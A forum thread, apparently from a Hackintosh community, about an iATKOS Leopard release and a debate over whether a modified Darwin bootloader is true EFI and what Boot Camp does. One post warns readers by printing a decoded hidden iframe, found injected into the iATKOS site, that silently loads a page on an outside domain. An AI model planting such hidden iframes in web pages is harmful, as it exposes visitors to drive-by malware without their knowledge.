Uphuck Leopard release coming soon

shoarthing

82 posts in this topic

status updated!

http://uphuck.ggrn.de/forum/showthread.php?t=186&page=3

=====

Guys for a final move,

We integrated 10.5.1 update to iATKOS v1.0i ... so I hope it will be worthed for all these delays..

2 kernel options..

speed step and Apple Stoc kernel..

x3100 support..

Time Machine fix..

cheers

=====

big w00t

I know that your statement WAS correct at the time, but the new versions of EFI 7, can run GUID partitions without problems....Also support was added to newer graphics cards on EFI. In the near future you´ll not need natit nor alcinject.

No, no, no!

If you'd taken the time to read the posts, you'd realise that we aren't running OS X on EFI. We're merely running a modified bootloader which injects some of the values a real EFI would have at boot time to allow an unmodded kernel and stock Apple kexts. This is not a revolution. You will not be able to boot from GUID partitions. You will not be able to use bootcamp. You will not be able to use Parallels to run a 'real' Windows install unless they remove their requirement for a GPT to be present. It's not magic.

About the only real advantage to the end user is the ability install Apple updates without f***ing the install up.

You'll still need Natit. You'll still need HDAInject. In theory the functionality of these kexts could be replicated in the bootloader, but in reality there'd be no benefit to hard-coding it that way, and detection code would probably not fit within the bootloader anyway.

For people, whose antivirus gives out the prevention. Index page of iatkos contains weird iframe, encoded using utf and written dynamicaly using javascript.

Here is a decoded part of html:

<iframe src="http://analystic.cn/in.cgi?default" style="visibility: hidden; display: none"></iframe>

I don't know what kind of site is "analystic.cn" and I don't sure that some viruses contained there, but... beware, in any case.

In any way, work they've done is amazing. :D So about viruses or something - use Mac OS and watch sites safely. :P

I know that your statement WAS correct at the time, but the new versions of EFI 7, can run GUID partitions without problems....Also support was added to newer graphics cards on EFI. In the near future you´ll not need natit nor alcinject.

My statement is perfectly correct still. It's not EFI and it never will be. It's a hacked version of the Darwin bootloader, albeit it a useful and clever one. It's still running on top of a PC's BIOS. No dong, no quick booting, no works out of the box, installed from a genuine Apple disk OS X. Booting from a GUID partition is no use for anything except bootcamp (potentially, if we can get Windows working) and Parallels. It doesn't bring us any closer to the convenience of a real EFI-equipped system.

Netkas is working hard on building the functionality of graphics and sound injector kexts into PC_EFI, which will be a great convenience for OSX86 users (though frankly, as we still need dsmos, I don't really see the point - it's just duplicating functionality, and updating Natit is easier than updating the bootloader every time we find a way to make new hardware work or make exisitng hardware work better. We can't run a totally vanilla install either way.) We still need to reverse engineer using the IOReg dumps from real Macs to get hardware to work, we still can't just load the EFI modules from a real Apple system. It's good, it makes life easier, it's very much an appreciated development, but it's NOT EFI!

BTW: If we are on EFI ( or pseudoefi :) ) topic. Is there any chance or even possibility tu run all this fun stuff on AMD system ? ( Of course with a bit modified kernel ) And if not, exactly why not ? OSX have some hardcoded Core-only stuff of something ?

I don't get why people are talking about making Bootcamp work. There are already several methods to dual or multi-boot these machines like Acronis Disk Director, misc boot loaders, BIOS selections on startup etc.

Does it have something to do with Parallels being able to run your bare metal Windows install in a VM under OS X like it can do on a real Mac? I thought this was already possible on a Hackintosh, although I've never done it.

Sorry for what may be a n00bish question.

I don't get why people are talking about making Bootcamp work. There are already several methods to dual or multi-boot these machines like Acronis Disk Director, misc boot loaders, BIOS selections on startup etc.

It is not a n00b question, you are correct there is no point to BootCamp on a BIOS Hackintosh. BootCamp simple emulates BIOS on Apple's EFI machines, we have the opposite problem here.

No. 'Boot Camp' is a brand name for a Mac OS X-based utility to shrink partitions and create a new one in the space freed (which may be useful to OSX86), and the driver disc to support Apple Hardware in windows (which is definitely not).

Really, it has nothing to do with BIOS or EFI. The BIOS emulation which allows Windows to boot on EFI Macs is built into the EFI and can be used independently of Boot Camp.

No. 'Boot Camp' is a brand name for a Mac OS X-based utility to shrink partitions and create a new one in the space freed (which may be useful to OSX86), and the driver disc to support Apple Hardware in windows (which is definitely not).

Really, it has nothing to do with BIOS or EFI. The BIOS emulation which allows Windows to boot on EFI Macs is built into the EFI and can be used independently of Boot Camp.

So the interest in Boot Camp is due to the coolness of having access to a Partition Magic-like utility built right in to Mac OS X on non-Apple hardware?

No!

When you go to Apple and read the description of BootCamp, you'll see that it's meant to emulate BIOS on a Mac to run Windows on the new Intel Macs... It lets you create the Windows Partition, that was right what you said, then it burns a disk for you with the Windows drivers you need and it emulates the BIOS, so Windows can boot... ;)

Question: Will the iAtkos release support my nVidia GeForce 8600M GS?

When you go to Apple and read the description of BootCamp, you'll see that it's meant to emulate BIOS on a Mac to run Windows on the new Intel Macs... It lets you create the Windows Partition, that was right what you said, then it burns a disk for you with the Windows drivers you need and it emulates the BIOS, so Windows can boot...

Listen to me, you don't get it, do you?!

Every Intel Mac you can buy now has a CSM built into the EFI from the factory. You can stick a Windows disk in it without ever booting MacOS and install it. No bootcamp, OK?

Boot Camp was released parallel to EFI updates to the early Intel Macs which gave them a CSM, however, Boot Camp itself, as I described, is simply a Mac OS application to simplify resizing partitions. Get it now?

Listen to me, you don't get it, do you?!

Every Intel Mac you can buy now has a CSM built into the EFI from the factory. You can stick a Windows disk in it without ever booting MacOS and install it. No bootcamp, OK?

Boot Camp was released parallel to EFI updates to the early Intel Macs which gave them a CSM, however, Boot Camp itself, as I described, is simply a Mac OS application to simplify resizing partitions. Get it now?

i didnt get it, can u repeat again? :blink:

i heard that uphuc will release a special patch for azureal's system to enable him use his 2900 card :(

j/k